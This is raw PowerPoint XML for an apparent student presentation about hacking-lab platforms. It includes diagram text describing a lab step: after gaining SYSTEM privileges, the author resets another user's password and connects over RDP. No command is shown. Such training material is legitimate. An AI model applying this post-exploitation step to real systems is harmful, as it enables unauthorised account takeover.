        <pc:chgData name="SREERAJ VAKKATTU SUNIL" userId="134404a4-df60-4f5f-b56a-bb9ac55391ed" providerId="ADAL" clId="{850C976F-B524-45CF-BA85-A36464A3BF37}" dt="2025-02-14T12:04:58.253" v="593" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3766535190" sldId="329"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="SREERAJ VAKKATTU SUNIL" userId="134404a4-df60-4f5f-b56a-bb9ac55391ed" providerId="ADAL" clId="{850C976F-B524-45CF-BA85-A36464A3BF37}" dt="2025-02-14T12:03:33.663" v="567" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3766535190" sldId="329"/>
            <ac:spMk id="2" creationId="{270A264B-8E01-7266-89AD-D168DBCEB2E8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="SREERAJ VAKKATTU SUNIL" userId="134404a4-df60-4f5f-b56a-bb9ac55391ed" providerId="ADAL" clId="{850C976F-B524-45CF-BA85-A36464A3BF37}" dt="2025-02-14T12:03:32.022" v="566" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3766535190" sldId="329"/>
            <ac:spMk id="3" creationId="{F6B411F3-1964-5B09-4A0D-61502B088092}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="SREERAJ VAKKATTU SUNIL" userId="134404a4-df60-4f5f-b56a-bb9ac55391ed" providerId="ADAL" clId="{850C976F-B524-45CF-BA85-A36464A3BF37}" dt="2025-02-14T12:04:26.129" v="586" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3766535190" sldId="329"/>
            <ac:picMk id="4" creationId="{E33436ED-2E2E-72A4-2F33-84CBE817412C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="SREERAJ VAKKATTU SUNIL" userId="134404a4-df60-4f5f-b56a-bb9ac55391ed" providerId="ADAL" clId="{850C976F-B524-45CF-BA85-A36464A3BF37}" dt="2025-02-14T12:04:34.938" v="588" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3766535190" sldId="329"/>
            <ac:picMk id="5" creationId="{47CD28B2-A851-6736-51F3-37A800B1B482}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="SREERAJ VAKKATTU SUNIL" userId="134404a4-df60-4f5f-b56a-bb9ac55391ed" providerId="ADAL" clId="{850C976F-B524-45CF-BA85-A36464A3BF37}" dt="2025-02-14T12:04:33.210" v="587" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3766535190" sldId="329"/>
            <ac:picMk id="6" creationId="{E60138B5-F7F1-1F41-565D-7B78E1281112}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="SREERAJ VAKKATTU SUNIL" userId="134404a4-df60-4f5f-b56a-bb9ac55391ed" providerId="ADAL" clId="{850C976F-B524-45CF-BA85-A36464A3BF37}" dt="2025-02-14T12:04:49.501" v="591" actId="1582"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3766535190" sldId="329"/>
            <ac:cxnSpMk id="8" creationId="{4EABA64D-36A8-10D0-2E99-BB68F9055F37}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="SREERAJ VAKKATTU SUNIL" userId="134404a4-df60-4f5f-b56a-bb9ac55391ed" providerId="ADAL" clId="{850C976F-B524-45CF-BA85-A36464A3BF37}" dt="2025-02-14T12:04:58.253" v="593" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3766535190" sldId="329"/>
            <ac:cxnSpMk id="9" creationId="{F22D42BC-5517-6237-AE49-CD1B938BDBFB}"/>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04681-D079-4D25-9B2D-1B1D60767499}"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9571FD04-BC8A-4107-BE37-9FDE56BE7D83}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" i="1"/>
            <a:t>Business issue, market analysis, solution etc.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7BC879F-13E2-4C15-AE5E-C9E987C474D4}" type="parTrans" cxnId="{8B5040E2-98C6-4307-8417-FFB7484F6C43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0917C660-A08E-4236-9EF7-F8B602790531}" type="sibTrans" cxnId="{8B5040E2-98C6-4307-8417-FFB7484F6C43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3B6932FC-3DB6-412F-80D8-055D87C05DF5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Some examples of products similar are:</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A57320C-FB21-498C-A1F0-7665D64A9116}" type="parTrans" cxnId="{4C1242FB-62A9-4B97-8114-29B8C859AA2B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B84AFF8-EBAE-4DDD-909C-52490ECB6CAE}" type="sibTrans" cxnId="{4C1242FB-62A9-4B97-8114-29B8C859AA2B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CBCDE2C4-F868-464C-9CFC-C4BCF65A5488}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>TryHackme</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{89A7981F-C3D5-4E53-87C9-A8ABF8FEACDD}" type="parTrans" cxnId="{F21F5C02-2439-46AF-B997-5F14C5B08C22}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{981CCD1D-D4EF-4B34-AEB1-534E1F9A3712}" type="sibTrans" cxnId="{F21F5C02-2439-46AF-B997-5F14C5B08C22}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83E8217B-063A-4F82-A54C-BEF7EA67EB2F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>HackTheBox</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2FC09BE4-5382-4726-BD94-70A86357C8E4}" type="parTrans" cxnId="{C3043141-3EBB-4993-AC6F-8540E7EFBDF0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{070F4A2E-745A-4D4B-B2C5-4F355B19C10D}" type="sibTrans" cxnId="{C3043141-3EBB-4993-AC6F-8540E7EFBDF0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00FDF619-F822-4554-AE5A-CDE49E542CBE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Virtual Hacking Labs</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A775CDAC-C52E-4821-A244-94CF92D7C248}" type="parTrans" cxnId="{8DEC4A40-C848-4D88-BE70-5E9883F724DB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C56697E9-DDF5-437A-A3C8-A5902FBB91BD}" type="sibTrans" cxnId="{8DEC4A40-C848-4D88-BE70-5E9883F724DB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C767068-5CA3-44AF-A44A-EDF56338EE1E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Offensive Security (OSCP Labs)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44F6D90C-F038-4200-B11E-BB59A45F0600}" type="parTrans" cxnId="{D54C8984-32F4-41D7-BBFC-E7CD30E7049B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{274C1F0B-AE28-4840-8939-F351CF5BBC38}" type="sibTrans" cxnId="{D54C8984-32F4-41D7-BBFC-E7CD30E7049B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{093A93FD-48BC-4FD3-9D56-A5FC7BC6EDA4}" type="pres">
      <dgm:prSet presAssocID="{29304681-D079-4D25-9B2D-1B1D60767499}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{14B48305-AE45-4840-917A-014089866373}" type="pres">
      <dgm:prSet presAssocID="{9571FD04-BC8A-4107-BE37-9FDE56BE7D83}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E5BBB597-421B-4695-A41E-E771321E958E}" type="pres">
      <dgm:prSet presAssocID="{0917C660-A08E-4236-9EF7-F8B602790531}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2ED94156-C028-4809-B479-276DB9947729}" type="pres">
      <dgm:prSet presAssocID="{3B6932FC-3DB6-412F-80D8-055D87C05DF5}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F4678D1B-FDDC-4AA3-A65A-3909B3B2066B}" type="pres">
      <dgm:prSet presAssocID="{4B84AFF8-EBAE-4DDD-909C-52490ECB6CAE}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4A42044F-BE2F-4DBF-A3A0-694AE603C524}" type="pres">
      <dgm:prSet presAssocID="{CBCDE2C4-F868-464C-9CFC-C4BCF65A5488}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{886E176F-C5A2-4DA3-95A9-D29A1903BAAD}" type="pres">
      <dgm:prSet presAssocID="{981CCD1D-D4EF-4B34-AEB1-534E1F9A3712}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A66A276E-BD6C-4893-B21D-CAE9BACC708D}" type="pres">
      <dgm:prSet presAssocID="{83E8217B-063A-4F82-A54C-BEF7EA67EB2F}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{41028E7D-7461-41EA-A94A-0B1F1A5B2F8D}" type="pres">
      <dgm:prSet presAssocID="{070F4A2E-745A-4D4B-B2C5-4F355B19C10D}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{249E1BB4-79F5-40C9-8058-615D61502EF2}" type="pres">
      <dgm:prSet presAssocID="{00FDF619-F822-4554-AE5A-CDE49E542CBE}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9AEE6332-74FC-4D53-ADAC-DBD404A11F6B}" type="pres">
      <dgm:prSet presAssocID="{C56697E9-DDF5-437A-A3C8-A5902FBB91BD}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{49C5A224-6654-4451-AAAC-C8424F6245AB}" type="pres">
      <dgm:prSet presAssocID="{2C767068-5CA3-44AF-A44A-EDF56338EE1E}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7F3CA800-AFA2-4BC1-A321-58413579AF1E}" type="presOf" srcId="{83E8217B-063A-4F82-A54C-BEF7EA67EB2F}" destId="{A66A276E-BD6C-4893-B21D-CAE9BACC708D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F21F5C02-2439-46AF-B997-5F14C5B08C22}" srcId="{29304681-D079-4D25-9B2D-1B1D60767499}" destId="{CBCDE2C4-F868-464C-9CFC-C4BCF65A5488}" srcOrd="2" destOrd="0" parTransId="{89A7981F-C3D5-4E53-87C9-A8ABF8FEACDD}" sibTransId="{981CCD1D-D4EF-4B34-AEB1-534E1F9A3712}"/>
    <dgm:cxn modelId="{A6806106-607F-4231-A2CE-653571BC839B}" type="presOf" srcId="{2C767068-5CA3-44AF-A44A-EDF56338EE1E}" destId="{49C5A224-6654-4451-AAAC-C8424F6245AB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{63AAED26-2A8D-47B9-B4C1-FF5A0EFA8E18}" type="presOf" srcId="{29304681-D079-4D25-9B2D-1B1D60767499}" destId="{093A93FD-48BC-4FD3-9D56-A5FC7BC6EDA4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{1A25622F-D90B-4859-A17B-FA609EAA0415}" type="presOf" srcId="{00FDF619-F822-4554-AE5A-CDE49E542CBE}" destId="{249E1BB4-79F5-40C9-8058-615D61502EF2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8DEC4A40-C848-4D88-BE70-5E9883F724DB}" srcId="{29304681-D079-4D25-9B2D-1B1D60767499}" destId="{00FDF619-F822-4554-AE5A-CDE49E542CBE}" srcOrd="4" destOrd="0" parTransId="{A775CDAC-C52E-4821-A244-94CF92D7C248}" sibTransId="{C56697E9-DDF5-437A-A3C8-A5902FBB91BD}"/>
    <dgm:cxn modelId="{C3043141-3EBB-4993-AC6F-8540E7EFBDF0}" srcId="{29304681-D079-4D25-9B2D-1B1D60767499}" destId="{83E8217B-063A-4F82-A54C-BEF7EA67EB2F}" srcOrd="3" destOrd="0" parTransId="{2FC09BE4-5382-4726-BD94-70A86357C8E4}" sibTransId="{070F4A2E-745A-4D4B-B2C5-4F355B19C10D}"/>
    <dgm:cxn modelId="{915F607A-E8A5-429E-AE5A-172E65F74E9F}" type="presOf" srcId="{9571FD04-BC8A-4107-BE37-9FDE56BE7D83}" destId="{14B48305-AE45-4840-917A-014089866373}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{D54C8984-32F4-41D7-BBFC-E7CD30E7049B}" srcId="{29304681-D079-4D25-9B2D-1B1D60767499}" destId="{2C767068-5CA3-44AF-A44A-EDF56338EE1E}" srcOrd="5" destOrd="0" parTransId="{44F6D90C-F038-4200-B11E-BB59A45F0600}" sibTransId="{274C1F0B-AE28-4840-8939-F351CF5BBC38}"/>
    <dgm:cxn modelId="{494DC2A2-9BFD-4560-BDC0-8C6EA10B62D1}" type="presOf" srcId="{3B6932FC-3DB6-412F-80D8-055D87C05DF5}" destId="{2ED94156-C028-4809-B479-276DB9947729}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8B5040E2-98C6-4307-8417-FFB7484F6C43}" srcId="{29304681-D079-4D25-9B2D-1B1D60767499}" destId="{9571FD04-BC8A-4107-BE37-9FDE56BE7D83}" srcOrd="0" destOrd="0" parTransId="{D7BC879F-13E2-4C15-AE5E-C9E987C474D4}" sibTransId="{0917C660-A08E-4236-9EF7-F8B602790531}"/>
    <dgm:cxn modelId="{575B36EA-2C5C-445C-A07C-9D5E596A2653}" type="presOf" srcId="{CBCDE2C4-F868-464C-9CFC-C4BCF65A5488}" destId="{4A42044F-BE2F-4DBF-A3A0-694AE603C524}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{4C1242FB-62A9-4B97-8114-29B8C859AA2B}" srcId="{29304681-D079-4D25-9B2D-1B1D60767499}" destId="{3B6932FC-3DB6-412F-80D8-055D87C05DF5}" srcOrd="1" destOrd="0" parTransId="{2A57320C-FB21-498C-A1F0-7665D64A9116}" sibTransId="{4B84AFF8-EBAE-4DDD-909C-52490ECB6CAE}"/>
    <dgm:cxn modelId="{340CF0F9-A2C6-4660-B7F5-BBA04E88D3AD}" type="presParOf" srcId="{093A93FD-48BC-4FD3-9D56-A5FC7BC6EDA4}" destId="{14B48305-AE45-4840-917A-014089866373}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{76089248-D6D2-44D7-8F15-2F4253717594}" type="presParOf" srcId="{093A93FD-48BC-4FD3-9D56-A5FC7BC6EDA4}" destId="{E5BBB597-421B-4695-A41E-E771321E958E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{638FB10D-582F-44D0-9F63-F17AEFDE0A33}" type="presParOf" srcId="{093A93FD-48BC-4FD3-9D56-A5FC7BC6EDA4}" destId="{2ED94156-C028-4809-B479-276DB9947729}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{54D36D72-A296-4732-AC9D-EF84E991D771}" type="presParOf" srcId="{093A93FD-48BC-4FD3-9D56-A5FC7BC6EDA4}" destId="{F4678D1B-FDDC-4AA3-A65A-3909B3B2066B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{4DB5C95B-CE99-4BBA-9718-14B4BE71C112}" type="presParOf" srcId="{093A93FD-48BC-4FD3-9D56-A5FC7BC6EDA4}" destId="{4A42044F-BE2F-4DBF-A3A0-694AE603C524}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F9DD9196-288D-4EA9-B9C2-CDED8C6DB089}" type="presParOf" srcId="{093A93FD-48BC-4FD3-9D56-A5FC7BC6EDA4}" destId="{886E176F-C5A2-4DA3-95A9-D29A1903BAAD}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{CB94D399-ED72-416D-84BE-FBD71C126C05}" type="presParOf" srcId="{093A93FD-48BC-4FD3-9D56-A5FC7BC6EDA4}" destId="{A66A276E-BD6C-4893-B21D-CAE9BACC708D}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{5D7097E0-7BFF-482A-942F-C9C3B7C5D01B}" type="presParOf" srcId="{093A93FD-48BC-4FD3-9D56-A5FC7BC6EDA4}" destId="{41028E7D-7461-41EA-A94A-0B1F1A5B2F8D}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{30E01B14-11E3-479D-B5C3-B241F215D33C}" type="presParOf" srcId="{093A93FD-48BC-4FD3-9D56-A5FC7BC6EDA4}" destId="{249E1BB4-79F5-40C9-8058-615D61502EF2}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{FC1E4099-0971-43A6-B2B6-199357AAC1B7}" type="presParOf" srcId="{093A93FD-48BC-4FD3-9D56-A5FC7BC6EDA4}" destId="{9AEE6332-74FC-4D53-ADAC-DBD404A11F6B}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{FE1D9DC3-BCA0-4B84-B5C9-CEEDF392CC3E}" type="presParOf" srcId="{093A93FD-48BC-4FD3-9D56-A5FC7BC6EDA4}" destId="{49C5A224-6654-4451-AAAC-C8424F6245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27F5C3-7F9B-4E32-B04D-CA09B0BEA77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06EEACC6-15E9-4ADF-BA87-133C14056FD2}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Since there is a username associated with Peter, we need to access the target machine using the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"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dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t> account. To do this, we must reset the password for </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"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dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t> and then attempt to connect to the target machine via RDP using the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"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dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t> credentials.</a:t>
          </a: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dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5EB32B3B-2DBB-480D-8F4F-02F6D3D0C5FD}" type="parTrans" cxnId="{EE00BE87-3C33-4FBE-B4AA-1E84ABAEF6AB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F36D03AC-2EE8-4904-A1F8-A08EF5312900}" type="sibTrans" cxnId="{EE00BE87-3C33-4FBE-B4AA-1E84ABAEF6AB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC0509EB-DCFC-4E9E-A474-917A3E16C8D1}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Since we already have the privileged account NT authority/system we can change the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"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dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t> password using  the below command.</a:t>
          </a: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dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB793469-9A22-47FD-A6D8-C7B91845FD9A}" type="parTrans" cxnId="{65409C5A-A023-4C9A-BCF9-3BE978780A8B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B7EEC07-E9CE-46DE-A54A-D68AF4CABE22}" type="sibTrans" cxnId="{65409C5A-A023-4C9A-BCF9-3BE978780A8B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C45289CB-7423-4C63-97C3-789B1ACCC19A}" type="pres">
      <dgm:prSet presAssocID="{8F27F5C3-7F9B-4E32-B04D-CA09B0BEA772}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC1A08E0-4375-4707-83B6-ADE80E79C441}" type="pres">
      <dgm:prSet presAssocID="{BC0509EB-DCFC-4E9E-A474-917A3E16C8D1}" presName="boxAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{675F7414-9D29-4628-AFD0-10C3384AA99E}" type="pres">
      <dgm:prSet presAssocID="{BC0509EB-DCFC-4E9E-A474-917A3E16C8D1}" presName="parentTextBox" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
